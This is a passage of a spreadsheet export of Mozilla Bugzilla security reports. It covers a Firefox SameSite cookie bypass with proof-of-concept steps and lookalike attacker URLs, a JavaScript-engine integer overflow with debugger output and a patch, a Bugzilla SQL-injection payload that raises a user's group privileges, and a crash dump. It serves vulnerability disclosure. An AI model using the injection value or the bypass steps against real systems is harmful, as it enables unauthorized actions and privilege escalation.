    Set-Cookie: mycookie=myvalue; SameSite=None; Secure;
    ```
Uses of Same Site Cookies
CSRF Protection: CSRF attacks involve an attacker tricking a user's browser into making an unintended request to a different site where the user is authenticated. If cookies are sent automatically with every request, the attacker could exploit this to perform unauthorized actions on behalf of the user. SameSite helps mitigate this risk by preventing cookies from being sent in certain cross-site scenarios.
What is Browser Fails to Protect Same Site Cookies
If a browser fails to properly enforce the SameSite=Strict attribute for cookies, it can have security implications, particularly in the context of cross-site request forgery (CSRF) attacks. Here are the potential impacts:
1. CSRF Vulnerability: The primary purpose of SameSite=Strict is to protect against CSRF attacks by preventing cookies from being sent in cross-site requests. If a browser fails to enforce this attribute, it could expose users to CSRF vulnerabilities. An attacker might be able to initiate unauthorized actions on behalf of a user if their cookies are automatically included in requests to a different site.
Ex. Daps Website/Program run inside firefox website, might have using SameSite cookie protection (now days most of them are doing it for CSRF protection) Now developer will think that because they have used SameSite Strict cookies, they are safe from CSRF attacks but because of this bypass they are still vulnerable.
2. Unauthorized Actions: CSRF attacks typically involve tricking a user's browser into performing actions on a target site without the user's consent. If SameSite=Strict is not enforced, an attacker could potentially perform actions, such as changing the user's account settings, making financial transactions, or performing any action that the user is authorized to do on the target site.
3. Cross-Site Tracking: SameSite=Strict also enhances privacy by preventing automatic cookie inclusion in cross-site requests. If this protection is not in place, third-party sites may have increased visibility into users' activities across different domains, leading to potential tracking and profiling.
4. Reduced Security by Design: SameSite=Strict is designed to be a security measure by default. If a browser fails to enforce it, the security posture of the web becomes weakened, as developers may rely on this protection when building and securing web applications.
Tested On
Windows 11 Pro
FireFox Window Version 121.0
The POC
Video https://drive.google.com/file/d/12SSLaTQHiNWHYt-53zC3yPO3_NjGLrg7/view?usp=sharing
POC Exploit Codes - Readily available below
https://g00gle.in/samefirefox/ss.php
https://g00gle.in/samefirefox/ss.html
https://g00gle.in/samefirefox/attacker.html
1.Browse https://g00gle.in/samefirefox/ss.php and First click on **1) FirstSet Same Site Cookie** Button which will create the same site strict cookie name as SecretCookie and its value as IUHUIGIGAIIGIGUIGSUIGIGIGSIGUIGUIFFTFDTRFYVUVBHJBHJ for website https://com.egghunter.in
2. Go back and now click on **2 ) Verify Same Site Cookie Are Se** now because the cookies are set as **Strict** you won't find them request to https://com.egghunter.in this is how FireFox browser is protecting user from CSRF Attacks because g00gle.in is cross domain which is requesting to "com.egghunter.in" both are cross domain so Strict Cookie won't be pass.
3. Now from Google Chrome browse this https://g00gle.in/samefirefox/attacker.html , there will be button to "Open In FireFox" open it and click on Open in prompt.
4. It will redirect from chrome to firefox with URL pointing to https://com.egghunter.in/showcookie.php but this time the SameSite cookies are sent to that server, which shows we bypass the SameSite cookie protection of firefox browser.
Suggestion
Do not send the same site a strict cookie via deeplink.
CVSS Score
1. **Attack Vector (AV): Network (N)**
   - **Reason:** The  attack is conducted remotely, targeting the network. This aligns with the scenario where a browser fails to protect SameSite=Strict cookies, and an attacker can exploit the vulnerability remotely.
2. **Attack Complexity (AC): Low (L)**
   - **Reason:** Exploiting the failure in SameSite=Strict is not particularly complex and can be achieved with relatively low effort.
3. **Privileges Required (PR): None (N)**
   - **Reason:** The assumption is that the attacker does not require any specific privileges to exploit the vulnerability. The attack can be carried out with minimal access.
4. **User Interaction (UI): Required (R)**
   - **Reason:** Victim needs to interact with attacker URL.
5. **Confidentiality (C): High (H)**
   - **Reason:** The  failure to protect SameSite=Strict cookies can lead to a high impact on confidentiality, potentially exposing sensitive information (cookies).
6. **Integrity (I): High (H)**
   - **Reason:** The integrity of the system is highly impacted by the vulnerability, as the attacker can  tamper with data or perform unauthorized actions using CSRF attack which is most important part of introducing same site cookies.
7. **Availability (A): Low (L)**
   - **Reason:** The assumption is that while the vulnerability has an impact on availability, it is not as severe as the impacts on confidentiality and integrity. The focus is on data manipulation rather than denial of service.
Impact
1. CSRF Vulnerability: The primary purpose of SameSite=Strict is to protect against CSRF attacks by preventing cookies from being sent in cross-site requests. If a browser fails to enforce this attribute, it could expose users to CSRF vulnerabilities. An attacker might be able to initiate unauthorized actions on behalf of a user if their cookies are automatically included in requests to a different site.
2. Unauthorized Actions: CSRF attacks typically involve tricking a user's browser into performing actions on a target site without the user's consent. If SameSite=Strict is not enforced, an attacker could potentially perform actions, such as changing the user's account settings, making financial transactions, or performing any action that the user is authorized to do on the target site.
3. Cross-Site Tracking: SameSite=Strict also enhances privacy by preventing automatic cookie inclusion in cross-site requests. If this protection is not in place, third-party sites may have increased visibility into users' activities across different domains, leading to potential tracking and profiling.
4. Reduced Security by Design: SameSite=Strict is designed to be a security measure by default. If a browser fails to enforce it, the security posture of the web becomes weakened, as developers may rely on this protection when building and securing web applications.</t>
        </is>
      </c>
      <c r="X5891" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5892">
      <c r="A5892" t="n">
        <v>1217609</v>
      </c>
      <c r="B5892" t="inlineStr">
        <is>
          <t>2015-10-22 15:00:52 -0700</t>
        </is>
      </c>
      <c r="C5892" t="inlineStr">
        <is>
          <t>Multiple invalid left shifts in libexpat</t>
        </is>
      </c>
      <c r="D5892" t="inlineStr">
        <is>
          <t>2023-05-22 21:26:20 -0700</t>
        </is>
      </c>
      <c r="E5892" t="n">
        <v>1</v>
      </c>
      <c r="F5892" t="n">
        <v>1</v>
      </c>
      <c r="G5892" t="n">
        <v>3</v>
      </c>
      <c r="H5892" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5892" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5892" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K5892" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5892" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5892" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5892" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5892" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P5892" t="inlineStr"/>
      <c r="Q5892" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5892" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5892" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5892" t="n">
        <v>1</v>
      </c>
      <c r="U5892" t="n">
        <v>0</v>
      </c>
      <c r="V5892" t="n">
        <v>12</v>
      </c>
      <c r="W5892" t="inlineStr">
        <is>
          <t>Created attachment 8677717
ubsan_results.txt
While fuzzing libexpat (2.1.0) I came a across a number of invalid left shifts.
I will attach the fixes I made to get past these errors. Please feel free to use these.</t>
        </is>
      </c>
      <c r="X5892" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5893">
      <c r="A5893" t="n">
        <v>303213</v>
      </c>
      <c r="B5893" t="inlineStr">
        <is>
          <t>2005-08-03 02:56:58 -0700</t>
        </is>
      </c>
      <c r="C5893" t="inlineStr">
        <is>
          <t>integer overflow in js</t>
        </is>
      </c>
      <c r="D5893" t="inlineStr">
        <is>
          <t>2006-03-12 18:46:06 -0800</t>
        </is>
      </c>
      <c r="E5893" t="n">
        <v>1</v>
      </c>
      <c r="F5893" t="n">
        <v>1</v>
      </c>
      <c r="G5893" t="n">
        <v>3</v>
      </c>
      <c r="H5893" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5893" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5893" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5893" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5893" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5893" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5893" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5893" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5893" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q5893" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5893" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5893" t="inlineStr">
        <is>
          <t>mozilla1.8beta4</t>
        </is>
      </c>
      <c r="T5893" t="n">
        <v>1</v>
      </c>
      <c r="U5893" t="n">
        <v>0</v>
      </c>
      <c r="V5893" t="n">
        <v>26</v>
      </c>
      <c r="W5893" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6
there are 2 integer overflows in jsstr.c js_str_escape.
there is chance of exploitability with favorable heap layout or eventually if
possible race with another thread. expoloitation is not trivial.
(gdb) break jsstr.c:366
Breakpoint 1 at 0xb7fbe6ee: file /opt/firefox-cvs/mozilla/js/src/jsstr.c, line 366.
(gdb) cont
Breakpoint 1, js_str_escape (cx=0x92e1770, obj=0x9012d68, argc=1, 
    argv=0x94808d4, rval=0x73f46008)
    at /opt/firefox-cvs/mozilla/js/src/jsstr.c:366
366         newchars = (jschar *) JS_malloc(cx, (newlength + 1) * sizeof(jschar));
(gdb) p/x length
$1 = 0x15800000
(gdb) p/x newlength
$2 = 0x81000000
(gdb) p/x (newlength + 1) * sizeof(jschar)
$3 = 0x2000002
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xb7fbe7d2 in js_str_escape (cx=0x92e1770, obj=0x9012d68, argc=1, 
    argv=0xa1f33008, rval=0x30) at /opt/firefox-cvs/mozilla/js/src/jsstr.c:383
383                 newchars[ni++] = digits[ch &gt;&gt; 12];
proposed patch:
-------------------------
--- jsstr.c.orig        2005-08-03 11:45:17.000000000 +0300
+++ jsstr.c     2005-08-03 11:49:56.000000000 +0300
@@ -352,6 +352,7 @@
     /* Take a first pass and see how big the result string will need to be. */
     for (i = 0; i &lt; length; i++) {
+       if (newlength + 2 &gt;= ((size_t) -1)/sizeof(jschar)) return JS_FALSE;   
         if ((ch = chars[i]) &lt; 128 &amp;&amp; IS_OK(ch, mask))
             continue;
         if (ch &lt; 256) {
-------------------------
it is strange the coverity tool didn't discover this.
Reproducible: Always
Steps to Reproduce:
url
Actual Results:  
SEGV
Expected Results:  
bill to write GNU man pages for living and mitchell to discover "text/plain"</t>
        </is>
      </c>
      <c r="X5893" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5894">
      <c r="A5894" t="n">
        <v>108822</v>
      </c>
      <c r="B5894" t="inlineStr">
        <is>
          <t>2001-11-07 00:02:30 -0800</t>
        </is>
      </c>
      <c r="C5894" t="inlineStr">
        <is>
          <t>[security] Any user can change their groupset!</t>
        </is>
      </c>
      <c r="D5894" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E5894" t="n">
        <v>1</v>
      </c>
      <c r="F5894" t="n">
        <v>1</v>
      </c>
      <c r="G5894" t="n">
        <v>4</v>
      </c>
      <c r="H5894" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5894" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5894" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K5894" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L5894" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5894" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5894" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5894" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5894" t="inlineStr">
        <is>
          <t>applied to 2.14.1</t>
        </is>
      </c>
      <c r="Q5894" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5894" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5894" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5894" t="n">
        <v>1</v>
      </c>
      <c r="U5894" t="n">
        <v>0</v>
      </c>
      <c r="V5894" t="n">
        <v>11</v>
      </c>
      <c r="W5894" t="inlineStr">
        <is>
          <t>userprefs.cgi has:
    SendSQL("UPDATE profiles SET mybugslink = '" . $::FORM{'mybugslink'} .
            "' WHERE userid = $userid");
playing with the mybugslink value on the form lets you do:
value="1', groupset='9223372036854775807"
It needs to be sqlescaped.</t>
        </is>
      </c>
      <c r="X5894" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5895">
      <c r="A5895" t="n">
        <v>19133</v>
      </c>
      <c r="B5895" t="inlineStr">
        <is>
          <t>1999-11-17 16:38:50 -0800</t>
        </is>
      </c>
      <c r="C5895" t="inlineStr">
        <is>
          <t>DOGFOOD Crash occurs when install progress dialog closes</t>
        </is>
      </c>
      <c r="D5895" t="inlineStr">
        <is>
          <t>2015-12-11 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E5895" t="n">
        <v>1</v>
      </c>
      <c r="F5895" t="n">
        <v>1</v>
      </c>
      <c r="G5895" t="n">
        <v>6</v>
      </c>
      <c r="H5895" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5895" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5895" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K5895" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5895" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M5895" t="inlineStr">
        <is>
          <t>Mac System 8.5</t>
        </is>
      </c>
      <c r="N5895" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5895" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5895" t="inlineStr">
        <is>
          <t>fix ready for checkin.</t>
        </is>
      </c>
      <c r="Q5895" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5895" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5895" t="inlineStr">
        <is>
          <t>M12</t>
        </is>
      </c>
      <c r="T5895" t="n">
        <v>1</v>
      </c>
      <c r="U5895" t="n">
        <v>0</v>
      </c>
      <c r="V5895" t="n">
        <v>15</v>
      </c>
      <c r="W5895" t="inlineStr">
        <is>
          <t>Build: 1999-11-17-08-M12 (MAC)
1. From http://jimbob/trigger2.html, select any test file from the drop-down
   menu such as a_adddelcomp
2. Click Trigger case button
3. Click OK button from confirmation dialog
  MacsBug 6.5.4a6, Copyright Apple Computer, Inc. 1981-98
PowerPC unmapped memory exception at 0B83E240
DocumentViewerImpl::~DocumentViewerImpl()+3E240
  17-Nov-1999 4:31:42 PM (since boot = 4 hours, 38 minutes)
  Current application is ³apprunner²
  Machine = 69 (PowerMac8500), System $0850, sysu = $01008000
  ROM version $077D, $28F2, $0001 (ROMBase $FFC00000)
  VM is on; paging is currently safe
  NIL^ = $FFC10000
  Stack space used = +65674050
 Address 0B83E240 is in VM file-mapped logical memory space
 PowerPC 604 Registers
                         CR0  CR1  CR2  CR3  CR4  CR5  CR6  CR7
  PC  = 0B83E240     CR  0010 1010 0000 0000 0000 1000 1000 0100
  LR  = 0B83E1F8         &lt;&gt;=O XEVO
  CTR = 0AB1A5A0
  MSR = 00000000         SOC Compare Count
  Int = 0            XER 001   00     00                     MQ  = 02DCC3AC
  R0  = 0B83E1F8     R8  = 02F043A0      R16 = 00000000      R24 = 03D943F4
  SP  = 03AB11AC     R9  = 00000001      R17 = 00000000      R25 = 03AB18B8
  TOC = 0353F450     R10 = 02F1C064      R18 = 00000000      R26 = 02F028BC
  R3  = 030DD16C     R11 = 02F1C104      R19 = 00000000      R27 = 03AB1340
  R4  = 030DD16C     R12 = 12130000      R20 = 00000000      R28 = 03AB134C
  R5  = 00000000     R13 = 00000000      R21 = 00000000      R29 = 030DD16C
  R6  = 030DD15C     R14 = 00000000      R22 = 00000000      R30 = 032989A8
  R7  = 00000008     R15 = 00000000      R23 = 00000000      R31 = 00000001
 Disassembling PowerPC code from 0B83E218
  DocumentViewerImpl::~DocumentViewerImpl()
            0B83E218   lwz        RTOC,0x0014(SP)                         |
80410014
            0B83E21C   lwz        r3,0x0048(SP)                           |
80610048
            0B83E220   lwz        r12,0x0000(r3)                          |
81830000
            0B83E224   lwz        r12,0x0010(r12)                         |
818C0010
            0B83E228   bl         $+0x58F20                  ; 0x0B897148 |
48058F21
            0B83E22C   lwz        RTOC,0x0014(SP)                         |
80410014
            0B83E230   li         r0,0x0000                               |
38000000
            0B83E234   stw        r0,0x0048(SP)                           |
90010048
            0B83E238   addi       r3,r29,0x0000                           |
387D0000
            0B83E23C   lwz        r12,0x0000(r29)                         |
819D0000
            0B83E240  *lwz        r12,0x0010(r12)                         |
818C0010
            0B83E244   bl         $+0x58F04                  ; 0x0B897148 |
48058F05
            0B83E248   lwz        RTOC,0x0014(SP)                         |
80410014
            0B83E24C   lwz        r3,0x0018(r30)                          |
807E0018
            0B83E250   li         r4,0x0000                               |
38800000
            0B83E254   lwz        r12,0x0000(r3)                          |
81830000
            0B83E258   lwz        r12,0x00B0(r12)                         |
818C00B0
            0B83E25C   bl         $+0x58EEC                  ; 0x0B897148 |
48058EED
            0B83E260   lwz        RTOC,0x0014(SP)                         |
80410014
            0B83E264   lwz        r3,0x0010(r30)                          |
807E0010
 Heap zones
  #1  Mod        7069K  00002800 to 006E9DCF  SysZone^
  #2  Mod           6K    0000C1E0 to 0000DD7F  ROM read-only zone
  #3  Mod       56007K  006E9DD0 to 03D9BA9F  Process Manager zone
  #4  Mod       11801K    02EDF430 to 03A65B2F  ³apprunner²  ApplZone^  TheZone^
TargetZone
  #5  Mod         187K    03B20230 to 03B4EFDF  ³File Sharing Extension²
  #6  Mod          18K    03B5A4D0 to 03B5ED8F
  #7  Mod         942K    03B74A90 to 03C6058F  ³Finder²
  #8  Mod          83K    03C74E20 to 03C89D1F  ³Time Synchronizer²
  #9  Mod         361K    03C985B0 to 03CF2CAF  ³Folder Actions²
  #10 Mod          89K    03D43860 to 03D59F5F  ³Control Strip Extension²
  #11 Mod        2047K  04100000 to 042FFFDF
  #12 Mod         216K    04161370 to 0419736F
  #13 Mod          27K    041FB450 to 0420217F
Checking all heaps
 The System heap at 00002800 is ok
 The ROM read-only heap at 0000C1E0 is ok
 The Process Manager heap at 006E9DD0 is ok
 The ³apprunner² heap at 02EDF430 is ok
 The ³File Sharing Extension² heap at 03B20230 is ok
 The heap at 03B5A4D0 is ok
 The ³Finder² heap at 03B74A90 is ok
 The ³Time Synchronizer² heap at 03C74E20 is ok
 The ³Folder Actions² heap at 03C985B0 is ok
 The ³Control Strip Extension² heap at 03D43860 is ok
 Totaling the ³apprunner² heap at 02EDF430
                                 Total Blocks    Total of Block Sizes
  Free                           0087     #135   00339790     #3381136
  Nonrelocatable                 00BF     #191   0072220C     #7479820
  Relocatable                    05F2    #1522   0012AD20     #1223968
    Locked                       002E      #46   000CC2A0      #836256
    Purgeable and not locked     0000       #0   00000000           #0
  Heap size                      0738    #1848   00B866BC    #12084924
 The target heap is the System heap at 00002800
 Totaling the System heap at 00002800
                                 Total Blocks    Total of Block Sizes
  Free                           002D      #45   0000A5C0       #42432
  Nonrelocatable                 0857    #2135   0037540C     #3625996
  Relocatable                    0787    #1927   00367BC0     #3570624
    Locked                       0184     #388   0028F260     #2683488
    Purgeable and not locked     005E      #94   00034830      #215088
  Heap size                      100B    #4107   006E758C     #7239052
 The target heap is the ³apprunner² heap at 02EDF430
 Displaying File Control Blocks
  fRef File                   Vol         Type Fl Fork     LEof
  0002 System                 Webbies     zsys dW rsrc #6124761
  0060                        Webbies     €€€€ dw data #1032192
  00BE                        Webbies     €€€€ dw data #6193152
  011C VM Storage             Webbies     ZSYS dW data #70254592
  017A System Resources       Webbies     zsyr dw rsrc  #727502
  0BC2 System                 Webbies     zsys dw data #4072175
  0C20 Open Tpt AppleTalk LiŠ Webbies     libr dw rsrc  #502792
  0C7E Open Transport Library Webbies     libr dw rsrc  #524771
  0CDC OpenTransportLib       Webbies     otsl dw data  #501392
  0D3A Shared Library ManageŠ Webbies     INIT dw rsrc  #211694
  0D98 Open Transport Library Webbies     libr dw rsrc  #524771
  0DF6 Open Tpt AppleTalk LiŠ Webbies     libr dw rsrc  #502792
  0E54 Open Tpt Internet LibŠ Webbies     libr dw rsrc  #461056
  0EB2 OpenTpt Remote Access  Webbies     libr dw rsrc #1083183
  0F10 OpenTptAppleTalkLib    Webbies     otsl dw data   #48738
  0F6E OpenTpt Modem          Webbies     libr dw rsrc   #91506
  0FCC OpenTpt Remote Access  Webbies     libr dw rsrc #1083183
  102A Remote Access Log      Webbies     lzlg dW data  #129024
  1088 Open Transport Library Webbies     libr dw rsrc  #524771
  10E6 Serial (Built-in)      Webbies     libr dw rsrc   #63254
  1144 OpenTpt Serial ArbitrŠ Webbies     libr dw rsrc    #7974
  11A2 OpenTpt Serial ArbitrŠ Webbies     libr dw rsrc    #7974
  1200 Users &amp; Groups Data FŠ Webbies     BTFL dW data  #129024
  125E Apple Guide            Webbies     INIT dw data  #417352
  12BC ColorSync Extension    Webbies     appe dw data  #301152
  131A Contextual Menu ExtenŠ Webbies     INIT dw data   #66663
  1378 SOMobjects� for Mac OS Webbies     shlb dw data  #129152
  13D6 QuickTime�             Webbies     INIT dw data  #369846
  1434 Sound Manager          Webbies     INIT dw data   #15008
  1492 Speech Manager         Webbies     INIT dw data    #4000
  14F0 apprunner              Webbies     APPL dW rsrc   #97879
  154E Control Strip ExtensiŠ Webbies     appe dW rsrc   #67084
  15AC Find CM Items          Webbies     cmpi dw data   #21987
  160A Control Strip ExtensiŠ Webbies     appe dw data    #3160
  1668 Folder Actions         Webbies     appe dW rsrc    #4877
  16C6 Time Synchronizer      Webbies     appe dW rsrc    #6319
  1724 Finder                 Webbies     FNDR dw rsrc  #638602
  1782 Finder                 Webbies     FNDR dw data #1870234
  17E0 Color Picker           Webbies     INIT dw data    #6400
  183E File Sharing Library   Webbies     shlb dw data   #91214
  189C File Sharing Library   Webbies     shlb dw rsrc    #3190
  18FA Finder Preferences     Webbies     pref dW rsrc     #766
  1958 Desktop DB             Webbies     BTFL dW data  #387072
  19B6 Desktop DF             Webbies     DTFL dW data #2091426
  1A14 Time Synchronizer      Webbies     appe dw data   #37169
  1A72 OpenTptInternetLib     Webbies     otsl dw data  #257182
  1AD0 PrintingLib            Webbies     shlb dw data #1103024
  1B2E Folder Actions         Webbies     appe dw data   #17331
  1B8C File Sharing Extension Webbies     INIT dW rsrc  #194076
  1BEA AppleScriptLib         Webbies     shlb dw data   #22636
  1C48 Users &amp; Groups Data FŠ Webbies     BTFL dW data  #129024
  1CA6 Folder Actions Menus   Webbies     cmpi dw data   #10205
  1D04 apprunner              Webbies     APPL dw data   #29476
  1D62 AppleTalk Switch       Webbies     sdev dw data    #5066
  1DC0 File Sharing Strip     Webbies     sdev dw data    #8634
  1E1E File Sharing Library   Webbies     shlb dw rsrc    #3190
  1E7C Monitor BitDepth       Webbies     sdev dw data    #4794
  1EDA Monitor Resolution     Webbies     sdev dw data    #9750
  1F38 Sound Volume           Webbies     sdev dw data    #4154
  1F96 Video Mirroring        Webbies     sdev dw data    #4426
  1FF4 Web Sharing CS         Webbies     sdev dw data   #21334
  2052 AppleShare PDS         Webbies     BTFL dW data  #645120
  20B0 NSRuntime.shlb         Webbies     shlb dw data   #15704
  210E NSStdLib.shlb          Webbies     shlb dw data  #283869
  216C NSPR20.shlb            Webbies     shlb dw data  #210342
  21CA JavaScript.shlb        Webbies     shlb dw data  #398021
  2228 NetworkModular.shlb    Webbies     shlb dw data   #12258
  2286 xpcom.shlb             Webbies     shlb dw data  #556191
  22E4 libreg.shlb            Webbies     shlb dw data   #37794
  2342 webshell.shlb          Webbies     shlb dw data  #130810
  23A0 dom.shlb               Webbies     shlb dw data  #891819
  23FE Component Registry     Webbies     BINA dW data  #245327
  245C JSLoader.shlb          Webbies     shlb dw data   #17795
  24BA AppShell.shlb          Webbies     shlb dw data  #172158
  2518 chardet.shlb           Webbies     shlb dw data   #52404
  2576 uconv.shlb             Webbies     shlb dw data   #45434
  25D4 Network.shlb           Webbies     shlb dw data  #136155
  2632 resource.shlb          Webbies     shlb dw data    #9058
  2690 file.shlb              Webbies     shlb dw data   #31331
  26EE mimetype.shlb          Webbies     shlb dw data   #13376
  274C ucvlatin.shlb          Webbies     shlb dw data  #147777
  27AA widget.shlb            Webbies     shlb dw data  #287062
  2808 gfx.shlb               Webbies     shlb dw data  #152580
  2866 QuickTime� PowerPlug   Webbies     INIT dw data  #219681
  28C4 libutil.shlb           Webbies     shlb dw data    #5735
  2922 libimg.shlb            Webbies     shlb dw data   #51071
  2980 Text Encoding ConvertŠ Webbies     shlb dw data  #155168
  29DE WASTELib               Webbies     shlb dw data  #117737
  2A3C widget.shlb            Webbies     shlb dw rsrc     #921
  2A9A RDFLibrary.shlb        Webbies     shlb dw data  #593133
  2AF8 Chinese Encodings      Webbies     ecpg dw data   #14872
  2B56 Japanese Encodings     Webbies     ecpg dw data   #14952
  2BB4 Korean Encodings       Webbies     ecpg dw data   #10488
  2C12 Unicode Encodings      Webbies     ecpg dw data   #16872
  2C70 profile.shlb           Webbies     shlb dw data   #41851
  2CCE Mozilla Registry       Webbies     REGS dW data    #3366
  2D2C libpref.shlb           Webbies     shlb dw data   #56005
  2D8A ChomeRegistry.shlb     Webbies     shlb dw data   #32312
  2DE8 plugin.shlb            Webbies     shlb dw data   #88058
  2E46 nslocale.shlb          Webbies     shlb dw data   #47222
  2EA4 history.shlb           Webbies     shlb dw data   #37512
  2F02 Mork.shlb              Webbies     shlb dw data  #263770
  2F60 history.dat            Webbies     BINA dW data    #6542
  2FBE layout.shlb            Webbies     shlb dw data #3699867
  301C htmlparser.shlb        Webbies     shlb dw data  #424254
  307A unicharutil.shlb       Webbies     shlb dw data   #26139
  30D8 Caps.shlb              Webbies     shlb dw data   #76452
  3136 Cookie.shlb            Webbies     shlb dw data   #61639
  3194 xpinstall.shlb         Webbies     shlb dw data  #211056
  31F2 zlib.shlb              Webbies     shlb dw data   #42298
  3250 mailnews.shlb          Webbies     shlb dw data  #336817
  32AE Wallet.shlb            Webbies     shlb dw data  #116925
  330C bookmarks.shlb         Webbies     shlb dw data   #83414
  336A XPConnect.shlb         Webbies     shlb dw data  #186818
  33C8 oji.shlb               Webbies     shlb dw data   #87407
  3426 LiveConnect.shlb       Webbies     shlb dw data   #96730
  3484 view.shlb              Webbies     shlb dw data   #87735
  34E2 Search.shlb            Webbies     shlb dw data   #60117
  3540 lwbrk.shlb             Webbies     shlb dw data   #16774
  359E gifdecoder.shlb        Webbies     shlb dw data   #15041
  35FC about.shlb             Webbies     shlb dw data   #17808
  365A mozBrowser.shlb        Webbies     shlb dw data   #44326
  36B8 http.shlb              Webbies     shlb dw data   #67798
  3716 RegViewer.shlb         Webbies     shlb dw data   #22017
  3774 strres.shlb            Webbies     shlb dw data   #12160
  37D2 EditorTxmgr.shlb       Webbies     shlb dw data   #24815
  3830 EditorCore.shlb        Webbies     shlb dw data  #556697
  388E Install.log            Webbies     TEXT dW data       #0
  38EC libjar.shlb            Webbies     shlb dw data   #29208
  394A Netscape Registry      Webbies     REGS dW data #1685821
  39A8 StdLog                 Webbies     TEXT dW data   #33555
  #224 FCBs, #158 in use (including #27 fonts not listed), #66 free
 Displaying Driver Control Entries
  No drivers are busy.
 Displaying resource information:
  &gt;   Map $02F2B0B8, flags $0000, file $2A3C = widget.shlb
      Map $02EDF5B8, flags $0000, file $14F0 = apprunner
   +  Map $00003290, flags $801A, file $0003 = €ROM resources that override
System€
    S Map $00003374, flags $200D, file $0002 = System
      Map $00003210, flags $0014, file $017A = System Resources
      [Skipped $001B maps belonging to font files]
 Calling chain using A6/R1 links
  Back chain  ISA  Caller
  00000000    PPC  0BB33484
  03AB1980    PPC  0BB30808  main+00118
  03AB1900    PPC  0BB302D4  main1(int, char**)+00554
  03AB17F0    PPC  0BA6F9D0  nsAppShellService::Run()+00018
  03AB17B0    PPC  0B9F7D58  nsAppShell::Run()+00038
  03AB1730    PPC  0B9F84A0  nsMacMessagePump::DoMessagePump()+0003C
  03AB16E0    PPC  0B9F8768  nsMacMessagePump::DispatchEvent(int,
EventRecord*)+00168
  03AB1690    PPC  0AC99A60  Repeater::DoRepeaters(const EventRecord&amp;)+00030
  03AB1650    PPC  0B9DAAEC  nsMacNSPREventQueueHandler::RepeatAction(const
EventRecord&amp;)+000
20
  03AB1610    PPC  0AC2654C  nsEventQueueServiceImpl::ProcessEvents()+00064
  03AB15D0    PPC  0AC3965C  nsEventQueueImpl::ProcessPendingEvents()+00018
  03AB1590    PPC  0AD0207C  PL_ProcessPendingEvents+0007C
  03AB1540    PPC  0AD02118  PL_HandleEvent+00028
  03AB1500    PPC  0AC6C644  EventHandler(PLEvent*)+00044
  03AB14A0    PPC  0AC65940  XPTC_InvokeByIndex+0000C
  03AB1460    PPC  0AC65A48  _XPTC_InvokeByIndex+000C8
  03AB13BC    PPC  0A03B4E0  nsInstallProgressDialog::Close()+3B4E0
